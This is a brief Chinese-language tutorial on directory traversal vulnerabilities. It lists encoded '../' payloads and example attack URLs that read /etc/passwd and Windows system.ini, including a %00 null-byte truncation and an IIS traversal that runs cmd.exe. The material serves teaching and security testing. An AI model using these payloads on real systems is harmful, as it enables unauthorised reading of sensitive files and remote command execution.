“目錄遍歷漏洞”指通過在URL或引數中構造“../”，或“../”和類似的跨父目錄字串的ASCII編碼、unicode編碼等，完成目錄跳轉，讀取作業系統各個目錄下的敏感檔案，也可以稱作“任意檔案讀取漏洞”。

../
..%2F
/%c0%ae%c0%ae/
%2e%2e%2f
..\
..//

目錄遍歷漏洞原理：程式沒有充分過濾使用者輸入的../之類的目錄跳轉符，導致使用者可以通過提交目錄跳轉來遍歷伺服器上的任意檔案。使用多個..符號，不斷向上跳轉，最終停留在根/，通過絕對路徑去讀取任意檔案。

目錄遍歷漏洞示例與測試：
http://210.151.85.128/../../../../../../../../../etc/passwd

http://www.test.com/my.jsp?file=../../Windows/system.ini

//藉助“%00”空字元截斷是一個比較經典的攻擊手法
http://www.test.com/my.jsp?file=../../Windows/system.ini%00.js

//使用了IIS的指令碼目錄來移動目錄並執行指令
http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\

構造url然後使用瀏覽器直接訪問，或者使用web漏洞掃描工具檢測，當然也可以自寫程式測試